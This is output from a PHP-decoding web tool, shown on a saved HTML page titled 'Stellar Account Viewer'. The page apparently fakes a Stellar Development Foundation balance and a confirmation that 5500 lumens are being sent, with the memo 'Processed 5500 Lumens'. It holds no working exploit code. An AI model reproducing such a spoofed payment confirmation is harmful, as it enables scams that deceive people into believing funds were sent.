Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<!DOCTYPE html> <html class="no-js"><head> <meta http-equiv="content-type" content="text..

Decoded Output download

<?  <!DOCTYPE html> 
<html class="no-js"><head> 
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style> 
  <meta charset="utf-8"> 
  <title>Stellar Account Viewer</title> 
  <meta name="description" content=""> 
  <meta name="viewport" content="width=device-width"> 
<link href="Stellar%20Account%20Viewer_files/style-8ede3607c73899fd87a40ea034f3dff0.css" rel="stylesheet"></head> 
<body> 
<!-- uiView: --><div ui-view="" class="ng-scope"><div class="so-back ng-scope" ng-controller="interstellar-basic-client.HeaderController as header"> 
  <div class="so-chunk"> 
    <div class="so-siteHeader siteHeader"> 
      <span class="so-logo"> 
        <a href="" class="so-logo__main">Stellar</a><!-- 
        --><span class="so-logo__separator"> </span><!-- 
        --><a href="" class="so-logo__subSite">	8,135,036,293 lumens distributed</a> 
      </span> 
      
    </div> 
  </div> 
</div> 
 
<interstellar-basic-client-balance class="ng-scope"><div class="so-back dashboardOverviewBack ng-scope" ng-controller="interstellar-basic-client.BalanceWidgetController as widget"> 
  <div class="so-chunk"> 
    <!-- ngIf: widget.balanceLoaded --><div class="dashboardOverviewRow ng-scope" ng-if="widget.balanceLoaded"> 
      <p class="dashboardOverviewRow__label">Stellar Development Foundation:</p> 
      <p class="dashboardOverviewRow__text ng-binding">103.61B XLM</p> 
      <!-- ngIf: widget.showRefreshButton --> 
    </div><!-- end ngIf: widget.balanceLoaded --> 
    <div class="dashboardOverviewRow"> 
    </div> 
  </div> 
 
  <!-- ngIf: widget.accountNotFound --> 
 
  <!-- ngIf: widget.invite --> 
</div> 
</interstellar-basic-client-balance> 
 
<div class="so-back ng-scope"> 
  <div class="so-chunk"> 
    <interstellar-basic-client-send><div class="sendPane ng-scope" ng-controller="interstellar-basic-client.SendWidgetController as widget"> 
  <h2 class="sendPane__title">Send lumens</h2> 
  <!-- ngIf: widget.view == 'sendSetup' --> 
 
  <!-- ngIf: widget.view == 'sendConfirm' --><div class="sendConfirm ng-scope" ng-if="widget.view == 'sendConfirm'"> 
    <p class="sendConfirm__addressLabel">sending lumens from </p> 
    <p class="sendConfirm__address ng-binding">Stellar Development Foundation</p> 
 
    <div class="sendConfirm__sendingContainer"> 
      <div class="sendConfirm__sendingContainer__label">Sending</div> 
      <div class="sendConfirm__sendingContainer__amount"> 
        <span class="sendConfirm__sendingContainer__amount__info ng-binding">5500</span> 
        <br> 
        <span class="sendConfirm__sendingContainer__amount__label">lumens</span> 
      </div> 
    </div> 
 
    <!-- ngIf: widget.memo --><div class="sendConfirm__sendingContainer ng-scope" ng-if="widget.memo"> 
      <div class="sendConfirm__sendingContainer__label">Memo</div> 
      <div class="sendConfirm__sendingContainer__amount"> 
        <span class="sendConfirm__sendingContainer__amount__helper ng-binding">MEMO_TEXT:</span> 
        <br> 
        <span class="sendConfirm__sendingContainer__amount__info ng-binding">Processed 5500 Lumens</span> 
      </div> 
    </div><!-- end ngIf: widget.memo --> 
    <!-- ngIf: !widget.memo && widget.memoWarningAlerts.length > 0 --> 
 
<div class="buttons"> 
     
 <a class="button" href="AccountViewer.html#" onclick="AccountViewer.html/();"> 
 
    <button class="s-button sendConfirm__submit" ng-click="widget.confirm()">Submit Lumens</button> 
 
 
     
   
 
 
 
<iframe src="chrome-extension://kmendfapggjehodndflmmgagdbamhnfd/u2f-comms.html" style="display:none"></iframe></body></html> ?>

Did this file decode correctly?

Original Code

<!DOCTYPE html>
<html class="no-js"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style>
  <meta charset="utf-8">
  <title>Stellar Account Viewer</title>
  <meta name="description" content="">
  <meta name="viewport" content="width=device-width">
<link href="Stellar%20Account%20Viewer_files/style-8ede3607c73899fd87a40ea034f3dff0.css" rel="stylesheet"></head>
<body>
<!-- uiView: --><div ui-view="" class="ng-scope"><div class="so-back ng-scope" ng-controller="interstellar-basic-client.HeaderController as header">
  <div class="so-chunk">
    <div class="so-siteHeader siteHeader">
      <span class="so-logo">
        <a href="" class="so-logo__main">Stellar</a><!--
        --><span class="so-logo__separator"> </span><!--
        --><a href="" class="so-logo__subSite">	8,135,036,293 lumens distributed</a>
      </span>
     
    </div>
  </div>
</div>

<interstellar-basic-client-balance class="ng-scope"><div class="so-back dashboardOverviewBack ng-scope" ng-controller="interstellar-basic-client.BalanceWidgetController as widget">
  <div class="so-chunk">
    <!-- ngIf: widget.balanceLoaded --><div class="dashboardOverviewRow ng-scope" ng-if="widget.balanceLoaded">
      <p class="dashboardOverviewRow__label">Stellar Development Foundation:</p>
      <p class="dashboardOverviewRow__text ng-binding">103.61B XLM</p>
      <!-- ngIf: widget.showRefreshButton -->
    </div><!-- end ngIf: widget.balanceLoaded -->
    <div class="dashboardOverviewRow">
    </div>
  </div>

  <!-- ngIf: widget.accountNotFound -->

  <!-- ngIf: widget.invite -->
</div>
</interstellar-basic-client-balance>

<div class="so-back ng-scope">
  <div class="so-chunk">
    <interstellar-basic-client-send><div class="sendPane ng-scope" ng-controller="interstellar-basic-client.SendWidgetController as widget">
  <h2 class="sendPane__title">Send lumens</h2>
  <!-- ngIf: widget.view == 'sendSetup' -->

  <!-- ngIf: widget.view == 'sendConfirm' --><div class="sendConfirm ng-scope" ng-if="widget.view == 'sendConfirm'">
    <p class="sendConfirm__addressLabel">sending lumens from </p>
    <p class="sendConfirm__address ng-binding">Stellar Development Foundation</p>

    <div class="sendConfirm__sendingContainer">
      <div class="sendConfirm__sendingContainer__label">Sending</div>
      <div class="sendConfirm__sendingContainer__amount">
        <span class="sendConfirm__sendingContainer__amount__info ng-binding">5500</span>
        <br>
        <span class="sendConfirm__sendingContainer__amount__label">lumens</span>
      </div>
    </div>

    <!-- ngIf: widget.memo --><div class="sendConfirm__sendingContainer ng-scope" ng-if="widget.memo">
      <div class="sendConfirm__sendingContainer__label">Memo</div>
      <div class="sendConfirm__sendingContainer__amount">
        <span class="sendConfirm__sendingContainer__amount__helper ng-binding">MEMO_TEXT:</span>
        <br>
        <span class="sendConfirm__sendingContainer__amount__info ng-binding">Processed 5500 Lumens</span>
      </div>
    </div><!-- end ngIf: widget.memo -->
    <!-- ngIf: !widget.memo && widget.memoWarningAlerts.length > 0 -->

<div class="buttons">
    
 <a class="button" href="AccountViewer.html#" onclick="AccountViewer.html/();">

    <button class="s-button sendConfirm__submit" ng-click="widget.confirm()">Submit Lumens</button>


    
  



<iframe src="chrome-extension://kmendfapggjehodndflmmgagdbamhnfd/u2f-comms.html" style="display:none"></iframe></body></html>

Function Calls

None

Variables

None

Stats

MD5 9640553b2e88b8adce4b82070ac2aff8
Eval Count 0
Decode Time 75 ms